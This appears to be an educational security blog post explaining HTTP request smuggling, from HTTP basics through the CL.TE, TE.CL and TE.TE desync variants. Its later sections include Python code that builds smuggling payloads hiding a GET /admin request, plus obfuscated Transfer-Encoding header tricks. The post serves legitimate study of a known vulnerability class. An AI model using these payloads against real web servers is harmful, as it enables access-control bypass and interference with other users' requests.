The HTTP Request Smuggling vulnerability, also known as the HTTP Desync Attack, has been around for a while but was brought back to attention by security researcher James Kettle in 2019.
Initially, I found his paper on the subject to be challenging, but after conducting some research and breaking it down into smaller concepts, I realized that understanding a few basic HTTP concepts is all that is needed to understand this vulnerability.
In this blog, I will attempt to simplify the topic of HTTP Request Smuggling as much as possible. Let’s begin with HTTP.
What is HTTP?
HTTP (Hypertext Transfer Protocol) is the protocol used to transfer data across the web. It is the foundation of the World Wide Web and lets users access and exchange data online. With HTTP, a client (such as a web browser) sends a request to a server (such as a web server) to access a specific resource.
The server then returns the requested resource or, if it cannot be located, an error message. HTTP can carry many kinds of data, including text, images, video, and audio, and clients and servers communicate using several request methods, including GET and POST.
What is URI and URL?
URI: Uniform Resource Identifier
Every URL is also a URI, although there are some URIs that are not URLs. URIs identify, while URLs locate; nonetheless, locators are also identifiers.
URL: Uniform Resource Locator
A URL is a locator: it identifies a resource by stating where it can be found. Since all URLs are URIs, a URL functions as both. By analogy, a street address locates a place and also identifies me as a “resident of” that place. It specifically identifies me only as long as I live there alone; if I got a roommate, that would change.
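To make the distinction a little more concrete, here is a small sketch using Python's standard urllib.parse module. Both example strings are made up for illustration: the first is a URL (it says where the resource lives), while the second is a URN, a URI that names something without saying where to find it.

```python
from urllib.parse import urlsplit

# Hypothetical URL, used only for illustration.
url = urlsplit("https://example.com:8443/articles/smuggling?page=2#intro")

print(url.scheme)    # how to reach the resource
print(url.hostname)  # which host to contact
print(url.port)      # which port on that host
print(url.path)      # where the resource sits on that host
print(url.query)     # extra parameters for the resource
print(url.fragment)  # a position inside the resource

# A URN is a URI but not a URL: it identifies a book, but has no host
# or network location to fetch it from.
urn = urlsplit("urn:isbn:0451450523")
print(urn.scheme, repr(urn.netloc), urn.path)
```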
What Makes HTTP Communication Work?
- The HTTP server, the main element of an HTTP-based system, is in charge of accepting and processing client requests as well as delivering the proper responses.
- The HTTP client, often a web browser or mobile application, is the part that sends requests to the HTTP server.
- Request and response messages: These are the communications that take place between the client and server when a request for information is made, and a response is given.
- Protocols: The HTTP protocol establishes the rules and conventions for client-server communication.
- Network infrastructure: To allow communication between clients and servers, the HTTP-based system depends on a network infrastructure, such as the internet.
- Data storage and retrieval: To store and retrieve data in response to client requests, the HTTP server may employ a database or other data storage system.
- Security: To secure communication and safeguard sensitive data, the HTTP-based system may employ authentication and encryption mechanisms.
- User interface: A web browser or mobile application is often used as the user interface by users to engage with the system.
- Performance and Scalability: The HTTP-based system needs to be scalable and able to handle large numbers of requests.
Why Does HTTP Use TCP?
HTTP uses TCP because TCP offers a reliable connection between a client and a server. To maintain the integrity of HTTP messages, TCP makes sure that all data is delivered in the right order and that any lost or damaged data is retransmitted. TCP also uses flow control and error checking to avoid overwhelming the receiver and to keep communication between the client and server efficient. This is crucial for HTTP because it lets a web browser and a web server exchange messages without having to deal with lost or reordered data themselves.
Actions on a website are carried out using HTTP methods. The most common HTTP methods include:
GET: a method for getting data from a server.
POST: a method of sending data to a server for processing or storage.
PUT: used to create a resource at a given URL or to replace one that already exists.
DELETE: used to remove a server resource.
HEAD: used to obtain a resource’s headers alone, not its body.
PATCH: used to apply a partial update to a server resource.
OPTIONS: used to get the server’s list of accepted HTTP methods.
TRACE: used to perform a loop-back test in which the server echoes back the request it received, which helps diagnose the path between client and server.
HTTP Status Codes:
HTTP status codes are numeric codes that represent a web request’s status. The server sends these codes back to the client to let them know how a request has gone.
- Informational Response Status Codes: (100-199)
- Successful Response Status Codes: (200-299)
- Redirection Message Status Codes: (300-399)
- Client-Side Response Error Status Codes: (400-499)
- Server-Side Response Error Status Codes: (500-599)
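As a quick illustration of the ranges above, the following sketch maps a status code to its class by looking at the first digit. The function name status_class is my own; HTTPStatus comes from Python's standard library and is used here only to print the usual reason phrase.

```python
from http import HTTPStatus


def status_class(code: int) -> str:
    """Map a numeric status code to one of the five classes listed above."""
    classes = {
        1: "informational",
        2: "successful",
        3: "redirection",
        4: "client error",
        5: "server error",
    }
    if not 100 <= code <= 599:
        raise ValueError(f"not a valid HTTP status code: {code}")
    return classes[code // 100]


for code in (200, 301, 404, 500):
    # HTTPStatus supplies the standard reason phrase for well-known codes.
    print(code, HTTPStatus(code).phrase, "->", status_class(code))
```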
What is the Difference Between HTTP 1.0 and HTTP 1.1?
HTTP 1.0 is a straightforward request-response protocol. HTTP 1.1 is a more complex protocol that adds capabilities including persistent connections, improved caching, and request pipelining. Through chunked transfer encoding and improved error handling, HTTP 1.1 also enables better performance.
By default, every HTTP request made using HTTP/1.0 opens a new TCP connection, which is closed once the response has been delivered. This behavior can be changed by adding the Connection: keep-alive header to the request, in which case the TCP connection remains open, or what you may refer to as persistent, and further HTTP requests can be sent over it one after the other.
HTTP/1.1 keeps the TCP connection open by default, so multiple HTTP requests can be sent over the same connection. To close the connection instead after getting a complete response or after a timeout, use the Connection: close header.
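The default behavior of the two versions can be summarized in a few lines of code. This is only a sketch of the decision, assuming the header names have already been lowercased into a dictionary; the function name is my own and real servers also apply timeouts and other limits.

```python
def keeps_connection_open(version: str, headers: dict) -> bool:
    """Decide whether the TCP connection stays open after this exchange.

    `headers` is assumed to map lowercased header names to their values.
    """
    tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "close" in tokens:
        return False  # an explicit close always wins
    if version == "HTTP/1.1":
        return True  # persistent by default
    if version == "HTTP/1.0":
        return "keep-alive" in tokens  # persistent only on request
    raise ValueError(f"unexpected HTTP version: {version}")


print(keeps_connection_open("HTTP/1.0", {}))
print(keeps_connection_open("HTTP/1.0", {"connection": "keep-alive"}))
print(keeps_connection_open("HTTP/1.1", {}))
print(keeps_connection_open("HTTP/1.1", {"connection": "close"}))
```

Persistent connections matter for request smuggling because they are what allows several requests to travel back to back over the same connection.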
What is Chunked Encoding?
Chunked encoding is a method for sending a message body as a series of chunks rather than all at once. Each chunk is preceded by its size in hexadecimal, and a chunk of size zero marks the end of the body. This mechanism can be abused to exploit the request smuggling security flaw: by manipulating how the chunked data is delimited, attackers may be able to trick a server into treating part of one request as an additional request. By doing this, they may be able to bypass security measures and possibly obtain access to confidential data.
Sample Request for Chunked Encoding
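The sketch below is my own illustration of a chunked request, not the original figure. It builds a chunked body from two pieces of data and decodes it again; the host, path, and helper names are hypothetical, and the decoder assumes no chunk extensions or trailers.

```python
def encode_chunked(parts):
    """Encode an iterable of byte strings as a chunked message body."""
    out = b""
    for part in parts:
        if part:  # a zero-length chunk would end the body early
            out += f"{len(part):x}".encode("ascii") + b"\r\n" + part + b"\r\n"
    return out + b"0\r\n\r\n"  # the zero-size chunk marks the end


def decode_chunked(data):
    """Decode a chunked body; assumes no chunk extensions or trailers."""
    body = b""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end], 16)  # chunk size is hexadecimal
        pos = line_end + 2
        if size == 0:
            return body
        body += data[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


chunked_body = encode_chunked([b"hello", b" world"])
request = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + chunked_body

print(request.decode("ascii"))
```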
Types of Client-Server Architecture
A client device (such as a personal computer or mobile device) communicates with a central server to access resources or services in a client-server computing architecture.
In this design, the server reacts to the client device’s request for information or services by providing it with the requested information.
There are two main types of client-server architecture:
- Two-tier architecture: In this sort of architecture, the client device communicates directly with the server. The server responds with the information or service requested after receiving a request from the client device.
- Three-tier architecture: In this design, the client device and server communicate via an extra layer known as the application server. The client’s request must be processed by the application server before being sent to the server for processing. The requested information or service is subsequently provided by the server in response, and the client device receives it via the application server.
What is HTTP Request Smuggling?
HTTP request smuggling is a technique for interfering with how a website processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are frequently critical, giving an attacker the ability to bypass security measures, access private information without authorization, and directly compromise other application users.
How are Requests Differentiated by Servers?
Servers examine the requested URL, the request method (such as GET or POST), and the headers and arguments to distinguish between requests. This data is used by the server to decide what tasks to carry out and what resources to return in response to the request.
A GET request consists of a request line and headers. The request line contains the method and the URL and ends with the HTTP version (for example, HTTP/1.1). The server acts on the headers it recognizes and typically ignores any that it does not. A GET request normally has no body, so it ends at the blank line that follows the headers.
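Here is a minimal sketch of how a server might split a GET request into its parts and find where it ends. The function name and the example request are my own, and the parser is deliberately naive compared with a real server.

```python
def parse_request_head(raw: bytes):
    """Split a raw HTTP/1.x request into request line parts and headers."""
    # The blank line (CRLF CRLF) marks the end of the headers.
    head, separator, rest = raw.partition(b"\r\n\r\n")
    if not separator:
        raise ValueError("incomplete request: no blank line after the headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.lower()] = value.strip()
    return method, target, version, headers, rest


raw = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)
method, target, version, headers, rest = parse_request_head(raw)
print(method, target, version)
print(headers)
print(rest)  # nothing is left over: the request ended at the blank line
```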
Receiving requests doesn’t appear to be much of a problem, does it?
What about POST requests? POST bodies differ from one application to the next and from one framework to the next, so the server needs a way to tell where the body ends. Two headers exist for this purpose:
- Content-Length: The Content-Length header gives the size of the body of a request or response in bytes. The receiver reads exactly that many bytes after the headers and treats whatever follows as the next message. Knowing the size in advance can also help avoid problems caused by excessive payloads. The header is commonly included in HTTP requests and responses and is usually available through the headers property of an HTTP request or response object.
- Transfer-Encoding: The Transfer-Encoding header describes the kind of encoding used to send the body of a request or response. Typical values are “chunked,” “compress,” “deflate,” and “gzip.” The compression values shrink the message body to increase transfer speed, while “chunked,” the value that matters for request smuggling, sends the body as a series of size-prefixed chunks.
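One detail worth seeing in code is that Content-Length counts bytes, not characters, and that line terminators count too. The sketch below builds a POST request with a correct Content-Length; the helper name, host, and path are hypothetical.

```python
def build_post(host: str, path: str, body: str) -> bytes:
    """Build a raw POST request whose Content-Length matches the body bytes."""
    payload = body.encode("utf-8")
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/plain; charset=utf-8\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + payload


# "caf\u00e9" is "café": 4 characters, but 5 bytes in UTF-8.
# The trailing CRLF adds 2 more bytes.
body = "caf\u00e9\r\n"
request = build_post("example.com", "/notes", body)

print(len(body))                  # number of characters
print(len(body.encode("utf-8")))  # number of bytes, used for Content-Length
```

Being off by even a few bytes here is exactly what the smuggling techniques later in this post rely on.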
How is this Issue caused?
The issue arises when the front-end server and the back-end server use different headers to decide where a request ends, for example when the front-end server relies on Content-Length and the back-end server relies on Transfer-Encoding. Request smuggling is the result of the same request being handled differently by the two servers: they fall out of sync about where one request ends and the next begins, which leads to an unexpected outcome or response error.
As we now know, in a real-world N-tier client-server architecture many HTTP requests can be sent across a single TCP/IP connection. Where each request ends is identified by its headers, in particular Content-Length (CL) and Transfer-Encoding (TE).
The front-end and back-end systems must be able to discern between these requests effectively; otherwise, an attacker may send a malicious request that the front-end and back-end systems treat differently.
A request may use either or both of these headers to indicate where it ends. The HTTP specification states that if both the Transfer-Encoding and Content-Length headers are present, the Content-Length header must be ignored. But this might not be enough when several servers are chained together! Here is the issue:
- Some servers do not support the Transfer-Encoding header in requests.
- Some servers that do support the Transfer-Encoding header can be made to skip it if the header is obfuscated in some way.
As a result, confusion arises when front-end and back-end services disagree on this request distinction.
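The disagreement can be sketched as a single decision function run by two hypothetical servers. The function name and the supports_chunked flag are assumptions for illustration; a spec-following server gives Transfer-Encoding precedence, while a server without chunked support falls back to Content-Length.

```python
def choose_framing(headers: dict, supports_chunked: bool = True) -> str:
    """Return which header a (hypothetical) server uses to find the body end.

    `headers` is assumed to map lowercased header names to their values.
    """
    codings = [t.strip() for t in headers.get("transfer-encoding", "").lower().split(",")]
    if supports_chunked and "chunked" in codings:
        return "transfer-encoding"  # takes precedence when both are present
    if "content-length" in headers:
        return "content-length"
    return "no-body"


# One request carrying both headers, seen by two differently built servers.
headers = {"content-length": "13", "transfer-encoding": "chunked"}
front_end = choose_framing(headers, supports_chunked=False)
back_end = choose_framing(headers, supports_chunked=True)

print("front end uses:", front_end)
print("back end uses:", back_end)
```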
The attacker may then design a request that makes use of the CL and TE headers in a way that causes the front end and back end to each handle the request differently.
This gives rise to the following scenarios:
- CL.TE: The back-end server utilizes the Transfer-Encoding header whereas the front-end server uses the Content-Length header.
- TE.CL: The Transfer-Encoding header is used by the front-end server, and the Content-Length header by the back-end server.
- TE.TE: The Transfer-Encoding header is supported by both the front-end and back-end servers, but obfuscating the header in some way can induce one of the servers not to process it.
In a CL.TE request smuggling attack, the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. The attacker manipulates the request headers sent to a web application in an effort to get around security measures and obtain confidential data. By crafting the Content-Length and Transfer-Encoding headers, the attacker tricks the back-end server into interpreting the request in a way that gives the attacker access to protected resources.
An attacker might, for instance, send a request to a web application with the headers:
Content-Length: 126
Transfer-Encoding: chunked
The attacker places two distinct requests in one message, with the second request embedded in the POST body of the first. The front-end server, which uses Content-Length, treats the entire payload as one request. The back-end server, which uses Transfer-Encoding, sees a chunk of size 0, concludes that the POST body has ended, and hence treats the payload as two different requests.
Sample HTTP Request For CL.TE
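The following sketch is my own illustration of a CL.TE payload, not the original figure, so the Content-Length it computes differs from the 126 bytes mentioned above. It simulates how the two servers would measure the same body; the host, the /admin path, and the helper name are hypothetical, and the chunk parser assumes no trailers.

```python
def chunked_body_length(data: bytes) -> int:
    """Return how many bytes a chunked body occupies (no trailers assumed)."""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return pos + 2  # include the final CRLF after the zero chunk
        pos += size + 2


# The smuggled prefix is hidden after a zero-size chunk.
smuggled = b"GET /admin HTTP/1.1\r\nX-Ignore: x"
body = b"0\r\n\r\n" + smuggled
request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + body

# Front end (Content-Length): the whole body belongs to one request.
front_end_leftover = body[len(body):]

# Back end (Transfer-Encoding): the body ends at the zero-size chunk.
back_end_leftover = body[chunked_body_length(body):]

print("front end leaves:", front_end_leftover)
print("back end leaves: ", back_end_leftover)
```

Whatever the back end leaves unread stays on the connection and is prepended to the next request that arrives, which is what makes the smuggled bytes dangerous.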
In a TE.CL attack, the front-end server processes the Transfer-Encoding header and interprets the message body as chunked. It processes both chunks and forwards the request to the back-end server. The back-end server receives the request, sees that Content-Length is set to 4, and so processes only the first 4 bytes of the POST body. Anything that follows the first 4 bytes is treated as a new request.
Sample HTTP Request for TE.CL
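Again as my own illustration rather than the original figure, the sketch below builds a TE.CL payload with Content-Length set to 4 and shows what each server would read. The host, the /admin path, and the helper name are hypothetical, and the chunk parser assumes no trailers.

```python
def chunked_body_length(data: bytes) -> int:
    """Return how many bytes a chunked body occupies (no trailers assumed)."""
    pos = 0
    while True:
        line_end = data.index(b"\r\n", pos)
        size = int(data[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return pos + 2  # include the final CRLF after the zero chunk
        pos += size + 2


# The smuggled request is carried as the data of a single chunk.
smuggled = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"\r\n"
)
size_line = f"{len(smuggled):x}".encode("ascii") + b"\r\n"  # 4 bytes here
body = size_line + smuggled + b"\r\n" + b"0\r\n\r\n"
request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + body

# Front end (Transfer-Encoding): reads every chunk and forwards it all.
front_end_consumed = chunked_body_length(body)

# Back end (Content-Length: 4): reads only the chunk-size line.
back_end_body = body[:4]
back_end_leftover = body[4:]

print("front end forwards", front_end_consumed, "of", len(body), "body bytes")
print("back end body:    ", back_end_body)
print("back end leftover:", back_end_leftover)
```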
Because of the Content-Length header, the back-end server determines that the request body is 4 bytes long, which runs up to line 7 of the sample request. The back-end server treats the bytes after this as the start of the next request on the connection.
In a TE.TE attack, the Transfer-Encoding header is supported by both the front-end server and the back-end server, but one of the servers can be induced not to process it by obfuscating the header.
Transfer-Encoding headers can be hidden in a variety of ways. For instance:
Transfer-Encoding : chunked
X: X[\n]Transfer-Encoding: chunked
TE.TE vulnerabilities can be uncovered by finding a variation of the Transfer-Encoding header that only one of the front-end or back-end servers processes while the other ignores it.
Depending on whether it is the front-end or the back-end server that ignores the obfuscated Transfer-Encoding header, the rest of the attack resembles the CL.TE or TE.CL vulnerabilities described above.
Sample HTTP Request For TE.TE
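To show why obfuscation works, the sketch below feeds the same header lines, including the "Transfer-Encoding : chunked" variant with a space before the colon, to two hypothetical header parsers. One trims whitespace around header names and the other does not; both parsers and their names are assumptions for illustration, not the behavior of any particular server.

```python
def parse_headers(lines, strip_name_whitespace: bool) -> dict:
    """Parse header lines; optionally tolerate whitespace around the name."""
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        if strip_name_whitespace:
            name = name.strip()
        headers[name.lower()] = value.strip()
    return headers


def framing(headers: dict) -> str:
    """Pick the header used to find the end of the body."""
    if headers.get("transfer-encoding", "").lower() == "chunked":
        return "TE"
    if "content-length" in headers:
        return "CL"
    return "none"


header_lines = [
    "Host: example.com",
    "Content-Length: 4",
    "Transfer-Encoding : chunked",  # obfuscated: space before the colon
]

lenient_server = framing(parse_headers(header_lines, strip_name_whitespace=True))
strict_server = framing(parse_headers(header_lines, strip_name_whitespace=False))

print("lenient server uses:", lenient_server)
print("strict server uses: ", strict_server)
```

If the lenient parser sits on the front end, the situation behaves like TE.CL; if it sits on the back end, it behaves like CL.TE.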
In conclusion, we covered the basics of HTTP request smuggling, understanding its mechanisms and types of attacks. In the next part, we will explore attack vectors, including real-world scenarios and techniques used by attackers. Stay tuned for valuable insights on defending against these vulnerabilities and enhancing web application security.
Contributor: Prajyot Chemburkar